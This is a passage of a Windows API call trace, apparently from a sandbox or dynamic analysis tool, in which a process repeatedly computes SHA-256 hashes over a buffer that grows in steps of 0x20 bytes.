	[0217.096] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.096] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736b48
	[0217.096] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736b48, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736b48, pdwDataLen=0x1284a8) returned 1
	[0217.096] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.097] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.097] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.097] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.097] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0217.097] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.097] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736b70
	[0217.097] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736b70, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736b70, pdwDataLen=0x1284a8) returned 1
	[0217.097] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.097] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.097] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.098] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.098] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0217.098] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.098] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736b98
	[0217.098] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736b98, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736b98, pdwDataLen=0x1284a8) returned 1
	[0217.098] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.098] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.098] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.098] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.098] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0217.098] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.098] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736bc0
	[0217.098] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736bc0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736bc0, pdwDataLen=0x1284a8) returned 1
	[0217.098] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.098] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.098] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.099] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.099] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0217.099] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.099] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736be8
	[0217.099] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736be8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736be8, pdwDataLen=0x1284a8) returned 1
	[0217.099] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.099] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.099] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.099] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.099] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0217.099] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.099] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736c10
	[0217.099] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736c10, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736c10, pdwDataLen=0x1284a8) returned 1
	[0217.099] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.099] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.099] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.100] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.100] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0217.100] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.100] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736c38
	[0217.100] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736c38, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736c38, pdwDataLen=0x1284a8) returned 1
	[0217.100] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.100] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.100] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.100] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.100] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0217.100] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.100] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736c60
	[0217.100] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736c60, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736c60, pdwDataLen=0x1284a8) returned 1
	[0217.100] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.100] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.100] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.101] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.101] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0217.101] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.101] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736c88
	[0217.101] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736c88, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736c88, pdwDataLen=0x1284a8) returned 1
	[0217.101] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.101] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.101] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.101] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.101] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0217.101] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.101] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736cb0
	[0217.101] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736cb0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736cb0, pdwDataLen=0x1284a8) returned 1
	[0217.101] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.101] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.102] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.102] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.102] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0217.102] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.102] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736cd8
	[0217.102] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736cd8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736cd8, pdwDataLen=0x1284a8) returned 1
	[0217.102] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.102] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.102] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.102] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.102] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0217.102] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.102] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736d00
	[0217.102] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736d00, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736d00, pdwDataLen=0x1284a8) returned 1
	[0217.103] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.103] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.103] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.103] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.103] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0217.103] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.103] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736d28
	[0217.103] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736d28, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736d28, pdwDataLen=0x1284a8) returned 1
	[0217.103] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.103] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.103] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.103] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.103] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0217.104] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.104] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736d50
	[0217.104] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736d50, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736d50, pdwDataLen=0x1284a8) returned 1
	[0217.104] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.104] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.104] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.104] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.104] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0217.104] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.104] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736d78
	[0217.104] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736d78, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736d78, pdwDataLen=0x1284a8) returned 1
	[0217.104] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.104] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.104] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.105] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.105] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0217.105] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.105] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736da0
	[0217.105] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736da0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736da0, pdwDataLen=0x1284a8) returned 1
	[0217.105] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.105] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.105] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.105] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.105] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0217.105] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.105] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736dc8
	[0217.105] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736dc8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736dc8, pdwDataLen=0x1284a8) returned 1
	[0217.105] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.105] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.105] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.106] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.106] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0217.106] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.106] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736df0
	[0217.106] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736df0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736df0, pdwDataLen=0x1284a8) returned 1
	[0217.106] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.106] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.106] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.106] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.107] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0217.107] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.107] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736e18
	[0217.107] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736e18, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736e18, pdwDataLen=0x1284a8) returned 1
	[0217.107] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.107] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.107] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.107] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.107] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0217.107] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.107] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736e40
	[0217.107] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736e40, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736e40, pdwDataLen=0x1284a8) returned 1
	[0217.107] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.107] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.107] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.108] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.108] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0217.108] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.108] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736e68
	[0217.108] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736e68, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736e68, pdwDataLen=0x1284a8) returned 1
	[0217.108] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.108] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.108] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.108] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.108] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0217.108] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.108] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736e90
	[0217.108] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736e90, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736e90, pdwDataLen=0x1284a8) returned 1
	[0217.108] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.108] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.108] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.109] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.109] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0217.109] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.109] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736eb8
	[0217.109] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736eb8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736eb8, pdwDataLen=0x1284a8) returned 1
	[0217.109] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.109] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.109] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.109] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.109] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0217.109] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.109] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736ee0
	[0217.109] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736ee0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736ee0, pdwDataLen=0x1284a8) returned 1
	[0217.109] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.109] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.109] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.110] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.110] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0217.110] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736f08
	[0217.110] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736f08, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736f08, pdwDataLen=0x1284a8) returned 1
	[0217.110] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.110] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.110] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
